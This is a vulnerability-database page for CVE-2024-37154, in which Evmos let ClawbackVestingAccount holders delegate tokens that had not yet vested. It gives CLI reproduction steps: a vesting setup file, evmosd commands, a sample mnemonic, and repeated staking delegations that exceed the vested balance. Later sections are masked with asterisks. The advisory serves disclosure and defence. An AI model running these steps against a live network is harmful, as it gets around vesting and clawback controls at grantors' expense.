5.3

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-37154

GHSA ID

GHSA-7hrh-v6wp-53vw

EPSS Score

0.34469%

CWE

CWE-285

Published

6/6/2024

Updated

10/15/2024

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-37154

CVE-2024-37154: Evmos allows unvested token delegations

Impact

What kind of vulnerability is it? Who is impacted?

At the moment, users are able to delegate tokens that have not yet been vested. This affects employees and grantees who have funds managed via ClawbackVestingAccount.

Patches

Has the problem been patched? What versions should users upgrade to?

The PR linked to this advisory includes part of the fix. The remainder is in a second advisory on the Cosmos SDK fork.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

There is no effective workaround to fix or remediate this issue without a new release. The best solution is to contain the information about this vulnerability to minimize the number of users who know about it and can thus exploit it.

References

Are there any links users can visit to find out more?

See the integration tests for more details on the exploit, or use the following to reproduce it on the CLI:

Download vesting_setup.json with the following contents:

{
  "start_time": 1679602272,
  "periods": [
    {
      "coins": "100000000000000000000aevmos",
      "length_seconds": 10 
    },
    {
      "coins": "100000000000000000000aevmos",
      "length_seconds": 259200000
    }
  ]
}

Run the following CLI commands to reproduce the issue locally:

evmosd tx vesting create-clawback-vesting-account evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --vesting vesting_setup.json --from dev0 --fees 2000000000000000aevmos --home ~/.tmp-evmosd --yes

# Verify that the balance contains zero locked tokens, 1000000000000000aevmos vested, 1000000000000000aevmos unvested
evmosd q vesting balances evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd

evmosd keys add key1 --recover --home ~/.tmp-evmosd
# Enter the following mnemonic
skate tell option purity cattle poverty street act bone govern way various

evmosd q staking validators --home ~/.tmp-evmosd | grep operator_address

# Substitute the operator address from the previous query
# Note that this delegates 70% of the user's available stake
evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes

# Re-run the same command
evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes

# Note that the total delegations now exceed the user's vested balance
evmosd q staking delegations evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd

(GitHub Advisory)

5.3

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-37154

GHSA ID

GHSA-7hrh-v6wp-53vw

EPSS Score

0.34469%

CWE

CWE-285

Published

6/6/2024

Updated

10/15/2024

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Package Name	Ecosystem	Vulnerable Versions
github.com/evmos/evmos/v18	go	<= 18.1.0
github.com/evmos/evmos/v17	go	<= 17.0.1
github.com/evmos/evmos/v16	go	<= 16.0.4
github.com/evmos/evmos/v15	go	<= 15.0.0
github.com/evmos/evmos/v14	go	<= 14.1.0
github.com/evmos/evmos/v13	go	<= 13.0.2
github.com/evmos/evmos/v12	go	<= 12.1.6
github.com/evmos/evmos/v11	go	<= 11.0.2
github.com/evmos/evmos/v10	go	<= 10.0.1
github.com/evmos/evmos/v9	go	<= 9.1.0
github.com/evmos/evmos/v8	go	<= 8.2.3
github.com/evmos/evmos/v7	go	<= 7.0.0
github.com/evmos/evmos/v6	go	<= 6.0.4

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from improper validation of vested tokens during delegation. The ClawbackVestingAccount's delegation tracking (TrackDelegation) is a prime suspect as vesting accounts must enforce vesting schedule constraints. The staking module's Delegate function is also implicated as it interacts with account balances. The split fix between Evmos and their Cosmos SDK fork suggests both account-level tracking and staking logic needed correction. The reproduction steps demonstrate delegation exceeding vested amounts, indicating a failure in these core delegation validation mechanisms.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Imp**t _W**t kin* o* vuln*r**ility is it? W*o is imp**t**?_ *t t** mom*nt, us*rs *r* **l* to **l***t* tok*ns t**t **v* not y*t ***n v*st**. T*is *****ts *mploy**s *n* *r*nt**s w*o **v* *un*s m*n**** vi* `*l*w***kV*stin****ount`. ### P*t***s _**

Reasoning

T** vuln*r**ility st*ms *rom improp*r v*li**tion o* v*st** tok*ns *urin* **l***tion. T** `*l*w***kV*stin****ount`'s **l***tion tr**kin* (`Tr**k**l***tion`) is * prim* susp**t *s v*stin* ***ounts must *n*or** v*stin* s****ul* *onstr*ints. T** st*kin*

5.3

Basic Information

Concerned about an active attack path?

CVE-2024-37154: Evmos allows unvested token delegations

Impact

Patches

Workarounds

References

5.3

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI